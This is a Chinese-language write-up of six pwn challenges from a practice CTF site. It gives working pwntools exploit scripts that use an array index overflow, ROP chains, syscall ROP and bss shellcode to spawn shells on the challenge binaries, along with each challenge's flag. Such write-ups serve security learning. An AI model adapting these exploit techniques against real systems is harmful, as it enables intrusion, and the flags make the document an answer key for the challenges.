【WriteUp】Hackme CTF--Pwn题解

开刷开刷

catflag

Description:

nc hackme.inndy.tw 7709

Try using nc connect to server!

---

Solution:

具体实现

VZZ@LAPTOP-1LKROVMM ~
$ nc hackme.inndy.tw 7709
plz capture the flag after 5 seconds...
plz capture the flag after 4 seconds...
plz capture the flag after 3 seconds...
plz capture the flag after 2 seconds...
plz capture the flag after 1 seconds...
ls
flag
run.sh
shell
cat flag
FLAG{cat flag? dog flag!}

---

Flag:

FLAG{cat flag? dog flag!}

homework

Description:

nc hackme.inndy.tw 7701

Source Code, Index out bound, Return Address

---

Solution:

这题是一个数组越界写的题，不是很常见

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./homework')
else:
    p = remote('hackme.inndy.tw', 7701)
elf = ELF('./homework', checksec=False)

p.sendlineafter("What's your name? ", '')
p.sendlineafter('numbers\n > ', '1')
p.sendlineafter('Index to edit: ', '14')
p.sendlineafter('How many? ', str(int(0x080485FB)))
p.sendlineafter('numbers\n > ', '0')
p.interactive()

---

Flag:

FLAG{Yoooo, Index Over Flow in my home work......OeAbaFeGeLaF9dEQ}

ROP

Description:

nc hackme.inndy.tw 7704<br>

Tips: Buffer Overflow, ROP
ROP輕鬆談 by L4ys

---

Solution:

题目是静态链接的，也没有啥限制，直接 ROPgadget 的 ropchain 完事

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack

debug = 1
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./rop')
else:
    p = remote('hackme.inndy.tw', 7704)
elf = ELF('./rop', checksec=False)

pd = 'a' * 0x10
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea060) # @ .data
pd += pack('<I', 0x080b8016) # pop eax ; ret
pd += '/bin'
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea064) # @ .data + 4
pd += pack('<I', 0x080b8016) # pop eax ; ret
pd += '//sh'
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8
pd += pack('<I', 0x080492d3) # xor eax, eax ; ret
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
pd += pack('<I', 0x080481c9) # pop ebx ; ret
pd += pack('<I', 0x080ea060) # @ .data
pd += pack('<I', 0x080de769) # pop ecx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8
pd += pack('<I', 0x080492d3) # xor eax, eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0806c943) # int 0x80
p.sendline(pd)
p.interactive()

---

Flag:

FLAG{ROPgadget is your friend! 0w0...xmnGElie0sAvtcqq}

ROP2

Description:

nc hackme.inndy.tw 7703

ROPgadget not working anymore

---

Solution:

没找到 getshell 用的字符串所以自己构造一个 write 功能写一个/bin/sh\x00字符串到可执行区域就好

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./rop2')
else:
    p = remote('hackme.inndy.tw', 7703)
elf = ELF('./rop2', checksec=False)
plt_syscall = elf.plt['syscall']
addr_bss = elf.bss()
addr_main = 0x08048487

# sys_read(0, addr_bss, 8)
pd = 'a' * 0x10
pd += p32(plt_syscall)
pd += p32(addr_main)
pd += p32(0x03)
pd += p32(0)
pd += p32(addr_bss)
pd += p32(8)
pd += p32(addr_main)
p.sendline(pd)
sleep(0.1)
p.send('/bin/sh\x00')

# sys_execve(addr_bss, 0, 0)
# gdb.attach(p, "b *0x08048485\nc")
pd = 'a' * 0x10
pd += p32(plt_syscall)
pd += p32(addr_main)
pd += p32(0x0b)
pd += p32(addr_bss)
pd += p32(0)
pd += p32(0)
p.sendline(pd)
p.interactive()

---

Flag:

FLAG{Wow, you really know how to ROP!!!...V2rhMIjGNYqQ3Uyx}

toooomuch

Description:

nc hackme.inndy.tw 7702

Can you pass the game?

---

Solution:

题目文件跟第二个 toooomuch 一样，就是一个要真 flag 一个要假 flag

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./toooomuch')
else:
    p = remote('hackme.inndy.tw', 7702)
elf = ELF('./toooomuch', checksec=False)
addr_print_flag = elf.sym['print_flag']

pd = 'a' * 0x1c
pd += p32(addr_print_flag)
p.sendline(pd)
p.recvuntil('You are not allowed here!\n')
p.interactive()

---

Flag:

FLAG{B1N@RY S3@RCH 15 F@5T T0 TH3 GU355 NUM133R G@M3...Vx1uck7CvuaCEew7}

toooomuch-2

Description:

nc hackme.inndy.tw 7702

Get a shell, please.
Tips: Buffer overflow, 0x8048560, shellcode

---

Solution:

写 shellcode 到 bss 段最后再返回 bss 段就完事了

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 1
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./toooomuch')
else:
    p = remote('hackme.inndy.tw', 7702)
elf = ELF('./toooomuch', checksec=False)
plt_gets = elf.plt['gets']
addr_bss = elf.bss()
addr_toooomuch = 0x0804877E

pd = 'a' * 0x1c
pd += p32(plt_gets)
pd += p32(addr_bss)
pd += p32(addr_bss)
p.sendline(pd)
p.recvuntil('You are not allowed here!\n')
p.sendline(asm(shellcraft.sh()))
p.interactive()

---

Flag:

FLAG{Buffer overflow is pretty easy, right?...MbIfR7p9sbKbwPSp}